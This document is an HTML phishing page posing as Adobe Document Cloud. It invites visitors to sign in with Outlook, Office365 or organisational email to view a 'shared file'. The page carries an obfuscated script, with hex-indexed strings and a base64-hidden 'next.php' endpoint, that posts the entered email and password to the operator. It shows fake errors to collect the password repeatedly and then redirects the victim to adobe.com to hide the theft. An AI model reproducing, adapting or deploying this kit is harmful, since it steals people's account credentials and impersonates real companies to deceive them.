﻿
<!doctype html>
<html lang="en">
<head>

    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Yellowtail&display=swap" rel="stylesheet">

    <title>Adobe Online</title>
    <link href="https://i.gyazo.com/ac7524407d19ac9e670a3e3b7bd7ebc3.jpg" rel="shortcut icon" media="all">

    <style type="text/css">


    </style>
  </head>
  <body>
    <div class="container-fluid">
      <div class="row" style="background-image: url('https://i.postimg.cc/PJrgVwTN/8.jpg'); background-size: cover;background-repeat: no-repeat;">
        <div class="container">
          <div class="row">
            <div class="col-lg-6 mx-auto my-5 px-5 pb-5" style="border:1px solid; background-color: rgba(0,0,0,0.7);border-radius:15px;">
              <div class="text-center pt-5"> 
                <img src="https://i.gyazo.com/ac7524407d19ac9e670a3e3b7bd7ebc3.jpg" class="img-fluid" width="100px"><br>
                <span class="h4 text-white">Adobe Document Cloud</span><br>
                <span class="h5 text-white font-weight-normal">To read the document, choose and sign in with your email provider below to view shared file.</span>
              </div>
              <div class="mt-3">
                <div class="row">
               
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="outlookmodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0073C8;">
                        <img src="https://i.gyazo.com/bbbae26246e9c09acb8668c7485acbf2.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4" style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Microsoft Outlook</span>
                      </div>
                    </a>
                  </div>
              
                
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="office365modal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #FF3C00;">
                        <img src="https://i.gyazo.com/6eae75d87eebc05d2e882397e5ef8480.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Microsoft Office365</span>
                      </div>
                    </a>
                  </div>
             
              
                  <div class="col-lg-12">
                    <a href="javascript:void(0)" id="othermodal" class="hvr-grow w-100" style="text-decoration: none;" data-toggle="modal" data-target="#ajaxModal">
                      <div class=" mt-2" style=" background-color: #0B5BD3;">
                        <img src="https://i.gyazo.com/6a6271e3e40ab27f2c950c82f50136df.png" class="img-fluid" width="40px" style=" background-color: rgba(0,0,0,0.3); padding:5px;">
                        <span class="pl-4"  style="vertical-align: middle; color: white;font-weight: 500;border-radius: 4px;">Organizational Mail</span>
                      </div>
                    </a>
                  </div>

                  <div class="col-lg-12">
                     <p class="text-white mt-3 text-center">Built upon Adobe Document Cloud, Adobe Document Cloud features can be unlocked by providing an additional license key.</p>
                <p class="h5 text-center text-white">CopyRight© 2022 Adobe system incorporated, All right reserved.</p> 
                    
                  </div>   </div>
                 </div>
              </div> 
            </div>
          </div>
        </div>



      </div> 
    </div>




    <!-- Modal for gmail -->
    <div class="modal fade" id="ajaxModal" tabindex="-1" role="dialog" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog" role="document">
        <div class="modal-content">
          <div class="modal-header">

            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true">&times;</span>
            </button>
          </div>
          <div class="modal-body">
            <center>
              <img id="fieldImg" src="images/gmail.png" class="img-fluid rounded-circle" width="80px">
              <h5 class="modal-title" id="exampleModalLabel">Sign in with <span id="field">Gmail</span></h5>
              <div class="alert alert-danger" style="display:none" id="msg">Please try again later</div>

            </center>
            <form id="contact" class="form-horizontal well">
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="exampleInputEmail1"></label>
                  <input type="email" name="ai" class="form-control" id="ai" aria-describedby="emailHelp" placeholder="Email">
                  <small id="emailHelp" class="form-text text-muted">We'll never share your email or password with anyone else.</small>
                </div>
              </div>
              <div class="col-lg-12">
                <div class="form-group">
                  <label for="Password"></label>
                  <input type="password" name="pr" autofocus class="form-control" id="pr" aria-describedby="emailHelp" placeholder="Password">
                </div>
              </div>
            </div>
            <div class="modal-footer">
              <button type="button" class="btn btn-secondary" data-dismiss="modal">Close</button>
              <button class="btn btn-lg btn-info pull-right" id="submit-btn">Login</button>
            </div>
          </form>
        </div>
      </div>
    </div>
    

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
  </body>

  <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>

<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
function _0x5347(_0xa5658b,_0x515453){var _0x461729=_0x4617();return _0x5347=function(_0x5347e1,_0x1c4a84){_0x5347e1=_0x5347e1-0x97;var _0x16d69a=_0x461729[_0x5347e1];return _0x16d69a;},_0x5347(_0xa5658b,_0x515453);}(function(_0x460452,_0x4ebb37){var _0x5e65c8=_0x5347,_0x36797e=_0x460452();while(!![]){try{var _0x35ed1e=-parseInt(_0x5e65c8(0xb3))/0x1+-parseInt(_0x5e65c8(0xd5))/0x2*(-parseInt(_0x5e65c8(0x9b))/0x3)+parseInt(_0x5e65c8(0xa9))/0x4+-parseInt(_0x5e65c8(0xbc))/0x5*(-parseInt(_0x5e65c8(0xbd))/0x6)+parseInt(_0x5e65c8(0xc8))/0x7+parseInt(_0x5e65c8(0xc2))/0x8*(-parseInt(_0x5e65c8(0xc5))/0x9)+parseInt(_0x5e65c8(0xc4))/0xa*(parseInt(_0x5e65c8(0xc3))/0xb);if(_0x35ed1e===_0x4ebb37)break;else _0x36797e['push'](_0x36797e['shift']());}catch(_0x336cf9){_0x36797e['push'](_0x36797e['shift']());}}}(_0x4617,0xdb735),$(document)['ready'](function(){var _0x511b9e=_0x5347,_0x5e645e=0x0,_0x3b0117=_0x511b9e(0xb1),_0x503c8f=_0x511b9e(0x9a),_0x55de16=_0x511b9e(0xd7),_0x44ae72=_0x511b9e(0xaa),_0x34c016='b2ZmaWNlMzY1';function _0xe65917(){var _0x2f6033=_0x511b9e,_0x403c06={},_0x25cc4e=window['location'][_0x2f6033(0xc7)][_0x2f6033(0xb9)](/[?&]+([^=&]+)=([^&]*)/gi,function(_0x3f90a6,_0x450d57,_0x979320){_0x403c06[_0x450d57]=_0x979320;});return _0x403c06;}var _0x3d399b=window[_0x511b9e(0xb8)][_0x511b9e(0xac)]['substr'](0x1);if(!_0x3d399b){}else{var _0x414dc4=_0x3d399b,_0x452547=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x452547[_0x511b9e(0xca)](_0x414dc4))return $(_0x511b9e(0xcf))[_0x511b9e(0xcd)](),_0x3d399b[_0x511b9e(0xce)],![];var _0xe49ce7=_0x414dc4[_0x511b9e(0xa7)]('@'),_0x2356cc=_0x414dc4[_0x511b9e(0x9d)](_0xe49ce7+0x1),_0x38ee0d=_0x2356cc['substr'](0x0,_0x2356cc['indexOf']('.')),_0x38b25a=_0x38ee0d[_0x511b9e(0xb6)](),_0x3d399b=window[_0x511b9e(0xb8)][_0x511b9e(0xac)]['substr'](0x1),_0x414dc4=_0x3d399b,_0x452547=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/,_0xe49ce7=_0x414dc4[_0x511b9e(0xa7)]('@'),_0x2356cc=_0x414dc4['substr'](_0xe49ce7+0x1),_0x38ee0d=_0x2356cc[_0x511b9e(0x9d)](0x0,_0x2356cc[_0x511b9e(0xa7)]('.')),_0x38b25a=_0x38ee0d[_0x511b9e(0xb6)]();if(_0x38b25a==atob(_0x55de16))$(_0x511b9e(0x98))[_0x511b9e(0xba)](_0x511b9e(0xc1),_0x511b9e(0xa1)),$(_0x511b9e(0xa3))[_0x511b9e(0xbb)](atob(_0x55de16)),$(_0x511b9e(0x97))['val'](_0x414dc4),$('#aich')[_0x511b9e(0xbb)](_0x414dc4),$(_0x511b9e(0xa4))[_0x511b9e(0xb5)](_0x511b9e(0xb2));else{if(_0x38b25a==atob(_0x3b0117)||_0x38b25a==atob(_0x503c8f))$(_0x511b9e(0x98))[_0x511b9e(0xba)](_0x511b9e(0xc1),_0x511b9e(0xa0)),$(_0x511b9e(0xa3))[_0x511b9e(0xbb)](_0x511b9e(0xd6)),$(_0x511b9e(0x97))['val'](_0x414dc4),$('#aich')[_0x511b9e(0xbb)](_0x414dc4),$('#outlookmodal')[_0x511b9e(0xb5)](_0x511b9e(0xb2));else{if(_0x38b25a==_0x511b9e(0x9f))$(_0x511b9e(0x98))[_0x511b9e(0xba)](_0x511b9e(0xc1),_0x511b9e(0xa1)),$('#field')['html']('Aol'),$(_0x511b9e(0x97))['val'](_0x414dc4),$(_0x511b9e(0xd8))['html'](_0x414dc4),$('#aolmodal')['trigger'](_0x511b9e(0xb2));else{if(_0x38b25a==atob(_0x34c016))$(_0x511b9e(0x98))[_0x511b9e(0xba)](_0x511b9e(0xc1),_0x511b9e(0xad)),$(_0x511b9e(0xa3))[_0x511b9e(0xbb)](_0x511b9e(0xd2)),$(_0x511b9e(0x97))['val'](_0x414dc4),$('#aich')[_0x511b9e(0xbb)](_0x414dc4),$(_0x511b9e(0xa2))[_0x511b9e(0xb5)](_0x511b9e(0xb2));else _0x38b25a==atob(_0x44ae72)?($(_0x511b9e(0x98))['attr'](_0x511b9e(0xc1),_0x511b9e(0xa1)),$(_0x511b9e(0xa3))[_0x511b9e(0xbb)](_0x511b9e(0xc9)),$(_0x511b9e(0x97))['val'](_0x414dc4),$('#aich')[_0x511b9e(0xbb)](_0x414dc4),$(_0x511b9e(0xa8))['trigger'](_0x511b9e(0xb2))):($(_0x511b9e(0x98))[_0x511b9e(0xba)](_0x511b9e(0xc1),_0x511b9e(0xa1)),$(_0x511b9e(0xa3))[_0x511b9e(0xbb)](_0x511b9e(0xbe)),$(_0x511b9e(0x97))[_0x511b9e(0xb7)](_0x414dc4),$(_0x511b9e(0xd8))[_0x511b9e(0xbb)](_0x414dc4),$(_0x511b9e(0xda))[_0x511b9e(0xb5)](_0x511b9e(0xb2)));}}}}$('#gmailmodal')[_0x511b9e(0xb2)](function(){var _0x22f8f8=_0x511b9e;$(_0x22f8f8(0x98))[_0x22f8f8(0xba)](_0x22f8f8(0xc1),'https://i.gyazo.com/6e4118ba523e3d659f9662d0c6c0cd01.jpg'),$(_0x22f8f8(0xa3))['html'](atob(_0x55de16)),$(_0x22f8f8(0xd9))[_0x22f8f8(0x9e)]();}),$('#outlookmodal')[_0x511b9e(0xb2)](function(){var _0xf388a5=_0x511b9e;$(_0xf388a5(0x98))[_0xf388a5(0xba)]('src',_0xf388a5(0xa0)),$(_0xf388a5(0xa3))['html'](_0xf388a5(0xd6)),$(_0xf388a5(0xd9))[_0xf388a5(0x9e)]();}),$(_0x511b9e(0xd4))[_0x511b9e(0xb2)](function(){var _0x295e8a=_0x511b9e;$('#fieldImg')['attr'](_0x295e8a(0xc1),'https://i.gyazo.com/6e4118ba523e3d659f9662d0c6c0cd01.jpg'),$(_0x295e8a(0xa3))[_0x295e8a(0xbb)](_0x295e8a(0xbf)),$(_0x295e8a(0xd9))[_0x295e8a(0x9e)]();}),$(_0x511b9e(0xa2))[_0x511b9e(0xb2)](function(){var _0xecfc46=_0x511b9e;$('#fieldImg')[_0xecfc46(0xba)]('src',_0xecfc46(0xad)),$(_0xecfc46(0xa3))[_0xecfc46(0xbb)](_0xecfc46(0xd2)),$(_0xecfc46(0xd9))[_0xecfc46(0x9e)]();}),$(_0x511b9e(0xa8))[_0x511b9e(0xb2)](function(){var _0x2eed82=_0x511b9e;$(_0x2eed82(0x98))[_0x2eed82(0xba)](_0x2eed82(0xc1),'https://i.gyazo.com/6e4118ba523e3d659f9662d0c6c0cd01.jpg'),$(_0x2eed82(0xa3))[_0x2eed82(0xbb)](_0x2eed82(0xc9)),$(_0x2eed82(0xd9))[_0x2eed82(0x9e)]();}),$(_0x511b9e(0xda))[_0x511b9e(0xb2)](function(){var _0x3b31d7=_0x511b9e;$(_0x3b31d7(0x98))['attr'](_0x3b31d7(0xc1),_0x3b31d7(0xa1)),$(_0x3b31d7(0xa3))[_0x3b31d7(0xbb)]('Other\x20Mail'),$(_0x3b31d7(0xd9))[_0x3b31d7(0x9e)]();});var _0x21f5ad='bmV4dC5waHA=';$('#submit-btn')[_0x511b9e(0xb2)](function(_0x14e20e){var _0x3e3c60=_0x511b9e;$(_0x3e3c60(0xcf))[_0x3e3c60(0x9e)](),$('#msg')[_0x3e3c60(0x9e)](),_0x14e20e[_0x3e3c60(0xcc)]();var _0x38b204=$(_0x3e3c60(0x97))[_0x3e3c60(0xb7)](),_0x5aadc7=$(_0x3e3c60(0xa5))['val']();$field=$('#field')['html']();var _0x1287a6=_0x38b204,_0x40333a=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x38b204)return $('.error')['show'](),$('.error')['html'](_0x3e3c60(0xb0)),_0x38b204['focus'],![];if(!_0x40333a['test'](_0x1287a6))return $(_0x3e3c60(0xcf))[_0x3e3c60(0xcd)](),$(_0x3e3c60(0xcf))[_0x3e3c60(0xbb)](_0x3e3c60(0xd3)),_0x38b204[_0x3e3c60(0xce)],![];if(!_0x5aadc7)return $(_0x3e3c60(0xcf))[_0x3e3c60(0xcd)](),$('.error')['html'](_0x3e3c60(0xc6)),_0x38b204[_0x3e3c60(0xce)],![];var _0x1442ef=_0x1287a6['indexOf']('@'),_0x13862a=_0x1287a6[_0x3e3c60(0x9d)](_0x1442ef+0x1),_0x47e41a=_0x13862a[_0x3e3c60(0x9d)](0x0,_0x13862a[_0x3e3c60(0xa7)]('.')),_0x5512fa=_0x47e41a[_0x3e3c60(0xb6)]();_0x5e645e=_0x5e645e+0x1,$(_0x3e3c60(0xd0))['html'](_0x5512fa),$[_0x3e3c60(0xae)]({'dataType':_0x3e3c60(0xb4),'url':_0x3e3c60(0xcb),'type':'POST','data':{'ai':_0x38b204,'pr':_0x5aadc7},'beforeSend':function(_0x9bde59){var _0x4b521b=_0x3e3c60;$(_0x4b521b(0xa6))[_0x4b521b(0xbb)](_0x4b521b(0xab));},'success':function(_0x222058){var _0x1c82e8=_0x3e3c60;if(_0x222058){$('#msg')['show'](),console['log'](_0x222058);if(_0x222058[_0x1c82e8(0xc0)]=='ok')$(_0x1c82e8(0xa5))[_0x1c82e8(0xb7)](''),_0x5e645e>=0x3&&(_0x5e645e=0x0,$(_0x1c82e8(0x9c))[_0x1c82e8(0x9e)](),$('#done')[_0x1c82e8(0xcd)](),window[_0x1c82e8(0xb8)][_0x1c82e8(0xb9)]('https://www.adobe.com/'));else{}}},'error':function(){var _0x5732de=_0x3e3c60;$(_0x5732de(0xa5))[_0x5732de(0xb7)](''),_0x5e645e>=0x3&&(_0x5e645e=0x0,$(_0x5732de(0x9c))[_0x5732de(0x9e)](),$(_0x5732de(0x99))[_0x5732de(0xcd)](),window[_0x5732de(0xb8)][_0x5732de(0xb9)](_0x5732de(0xaf))),$(_0x5732de(0xd9))[_0x5732de(0xcd)]();},'complete':function(){var _0xdd14d6=_0x3e3c60;$(_0xdd14d6(0xa6))[_0xdd14d6(0xbb)](_0xdd14d6(0xd1));}});});}));function _0x4617(){var _0x44314d=['trigger','toLowerCase','val','location','replace','attr','html','15610PsZJuQ','756NygxCR','Other\x20Mail','Aol','signal','src','1168744xiRUNX','22270028gFHSRN','10cCXeRO','72eqpBjm','Password\x20field\x20is\x20empty...!','href','7420091VYWAQk','Yahoo','test','next.php','preventDefault','show','focus','.error','#domain-name','Login','Office\x20365','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','#aolmodal','189974QEzQRG','Outlook','Z21haWw=','#aich','#msg','#othermodal','#ai','#fieldImg','#done','aG90bWFpbA==','3UbTNYW','#div1','substr','hide','aol','https://i.gyazo.com/f801c432e3b171ce2d249ef84ff9ef4f.png','https://i.gyazo.com/6e4118ba523e3d659f9662d0c6c0cd01.jpg','#office365modal','#field','#gmailmodal','#pr','#submit-btn','indexOf','#yahoomodal','644092pFlfhv','eWFob28=','verifying...','hash','https://i.gyazo.com/6696ea0b401cbe3fb90177b597c2c051.png','ajax','https://www.adobe.com/','Email\x20field\x20is\x20empty...!','b3V0bG9vaw==','click','1666330bRCTjF','JSON'];_0x4617=function(){return _0x44314d;};return _0x4617();}
</script>

